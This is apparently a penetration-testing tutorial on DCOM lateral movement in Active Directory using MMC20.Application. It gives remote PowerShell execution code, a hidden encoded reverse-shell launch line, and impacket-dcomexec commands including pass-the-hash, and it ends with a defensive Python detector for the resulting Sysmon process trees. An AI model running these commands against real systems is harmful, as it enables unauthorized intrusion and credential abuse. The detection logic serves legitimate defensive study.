# DCOM Attack

### Overview

**DCOM (Distributed Component Object Model)** is a Windows technology that allows software components to communicate over the network.

**DCOM runs over RPC** (the endpoint mapper on TCP port 135 plus a dynamically allocated high port) and reuses COM objects that are already present on Windows systems, so no payload has to be dropped on disk.

In Active Directory environments, DCOM can be abused for:

* Remote code execution
* Lateral movement
* Living-off-the-land execution

### Why this Works

Many COM objects:

* Are remotely accessible
* Allow method execution
* Run under privileged contexts

If you have:

* Valid domain credentials
* Local admin rights on a remote machine

You can:

* Instantiate certain COM objects remotely
* Trigger methods that execute commands

Some COM objects expose methods that run commands. `MMC20.Application` is the classic example: its `Document.ActiveView.ExecuteShellCommand()` method starts a program on the host where the object was instantiated.

### Prerequisites

1. Valid domain credentials
2. Local Administrator rights on target
3. RPC (135) reachable
4. DCOM not restricted by firewall

### Methods

**Method 1 (PowerShell DCOM Execution from Windows):**

```powershell
# Instantiate the MMC20.Application COM object on the remote host TARGET over DCOM
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","TARGET"))
# ExecuteShellCommand(Command, Directory, Parameters, WindowState); the child process is spawned by mmc.exe on TARGET
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c whoami","7")
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c powershell -nop -w hidden -enc <base64_reverse_shell>","7")
```

**Method 2 (Using Impacket from Linux):**

```bash
# Password authentication
impacket-dcomexec corp.com/jeff:Password123@192.168.1.50
# Pass-the-hash: supply the NT hash instead of the password
impacket-dcomexec -hashes :<NTLM_HASH> corp.com/jeff@192.168.1.50
```
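From the defender's side, both methods above leave a distinctive process tree on the target: DcomLaunch starts `mmc.exe` with `-Embedding`, and `ExecuteShellCommand()` then makes `mmc.exe` the parent of `cmd.exe` or `powershell.exe`. The following detection logic is an added example, not code from the original page or from ired.team; the Sysmon Event ID 1 records it runs over are constructed and flattened into `key=value` pairs, and the base64 token is a placeholder.

```python
import re
from typing import Dict, List

# Constructed Sysmon Event ID 1 (process creation) records, flattened to one
# "key=value|key=value" line each so the example runs offline. The command
# lines mirror the ones used in Method 1 above.
SAMPLE_EVENTS = [
    # Analyst opens a console interactively: benign.
    r"Computer=WS01|Image=C:\Windows\System32\mmc.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=mmc.exe eventvwr.msc|User=CORP\alice",
    # MMC20.Application activated over DCOM: DcomLaunch (svchost) starts mmc.exe with -Embedding ...
    r"Computer=WS01|Image=C:\Windows\System32\mmc.exe|ParentImage=C:\Windows\System32\svchost.exe|CommandLine=C:\Windows\system32\mmc.exe -Embedding|User=CORP\jeff",
    # ... and ExecuteShellCommand() then makes mmc.exe the parent of a shell.
    r"Computer=WS01|Image=C:\Windows\System32\cmd.exe|ParentImage=C:\Windows\System32\mmc.exe|CommandLine=cmd.exe /c whoami|User=CORP\jeff",
    r"Computer=WS01|Image=C:\Windows\System32\cmd.exe|ParentImage=C:\Windows\System32\mmc.exe|CommandLine=cmd.exe /c powershell -nop -w hidden -enc QQBCAEMA|User=CORP\jeff",
    # Ordinary shell from the desktop: benign.
    r"Computer=WS01|Image=C:\Windows\System32\cmd.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=cmd.exe /c ipconfig|User=CORP\alice",
]

# Child images that mmc.exe has no normal reason to spawn.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
# Hidden/encoded PowerShell arguments, as used in the Method 1 payload line.
SUSPICIOUS_ARGS = re.compile(r"[-/](enc|encodedcommand|w hidden|windowstyle hidden)\b", re.I)

def parse_event(line: str) -> Dict[str, str]:
    """Split a flattened record into a field map (the first '=' separates key from value)."""
    return dict(pair.split("=", 1) for pair in line.split("|"))

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def detect_dcom_mmc(events: List[str]) -> List[Dict[str, str]]:
    """Return one finding per event that matches the MMC20.Application DCOM pattern."""
    findings = []
    for line in events:
        ev = parse_event(line)
        image, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
        if parent == "mmc.exe" and image in SHELLS:
            # The ExecuteShellCommand() child itself; hidden/encoded arguments raise severity.
            sev = "high" if SUSPICIOUS_ARGS.search(cmd) else "medium"
            rule = "mmc.exe spawned a shell (MMC20.Application ExecuteShellCommand)"
        elif image == "mmc.exe" and parent == "svchost.exe" and "-embedding" in cmd.lower():
            # Out-of-process COM activation of mmc.exe; weak alone, strong when followed by the above.
            sev, rule = "low", "mmc.exe started by DCOM activation (-Embedding)"
        else:
            continue
        findings.append({"computer": ev["Computer"], "user": ev["User"], "severity": sev, "cmd": cmd, "rule": rule})
    return findings
```

Running `detect_dcom_mmc(SAMPLE_EVENTS)` yields three findings for `CORP\jeff` (low, medium, high) and none for the two interactive events; in production, correlate the low-severity activation with a preceding network logon (Event 4624, logon type 3) from the same account.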

